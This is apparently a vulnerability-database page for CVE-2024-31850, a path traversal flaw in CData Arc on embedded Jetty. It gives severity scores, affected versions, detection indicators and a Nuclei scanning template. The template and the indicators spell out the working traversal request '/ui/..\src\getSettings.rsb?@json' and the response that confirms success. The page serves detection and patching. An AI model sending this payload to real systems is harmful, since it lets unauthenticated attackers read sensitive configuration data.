CVE-2024-31850
published 2024-04-05CVE-2024-31850: A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an…
PriorityP265high8.6CVSS 3.1
AVNACLPRNUINSUCHILAL
EXPLOIT
EPSS
3.04%
85.9th percentile
A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cdata | arc | < 23.4.8839 | 23.4.8839 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect path traversal attempts using backslash characters in URI targeting CData Arc; look for requests containing '/..' and '\src\' patterns in the URL path, which Jetty does not reject unlike Tomcat. ↗
- →Alert on HTTP 200 responses to requests for '/ui/..\src\getSettings.rsb?@json' — a successful exploit returns Content-Type: application/json with body containing 'items', 'true', and 'notifyemail'.
- →The exploit bypasses security constraints defined in web.xml by routing through the /ui/ path prefix combined with backslash-based directory traversal; monitor servlet access logs for /ui/ requests resolving to /src/ endpoints. ↗
- ·Vulnerability only affects the Java version of CData Arc when deployed with the embedded Jetty server; deployments on Tomcat are NOT vulnerable as Tomcat rejects backslash characters in URIs. ↗
- ·Only CData Arc versions below 23.4.8839 are affected; patched versions mitigate the issue. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
CData Arc < 23.4.8839 - Path Traversal
nuclei·CVSS 9.8
CVE-2024-31850 [CRITICAL] CData Arc < 23.4.8839 - Path Traversal
CData Arc CData Arc'
- raw:
- |
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"items":[{'
- ':"true"'
- 'notifyemail'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022100fd4f4dce11d5e9e54734cfa2255cc7df84f383db73a1e6587a0dd321731ed85102204d79f9a8f301d89cade46c01b7d10c05516b04f35e9991a28e70e136859b650f:922c64590222798bb761d5b6d8e72950
2024-04-05
Published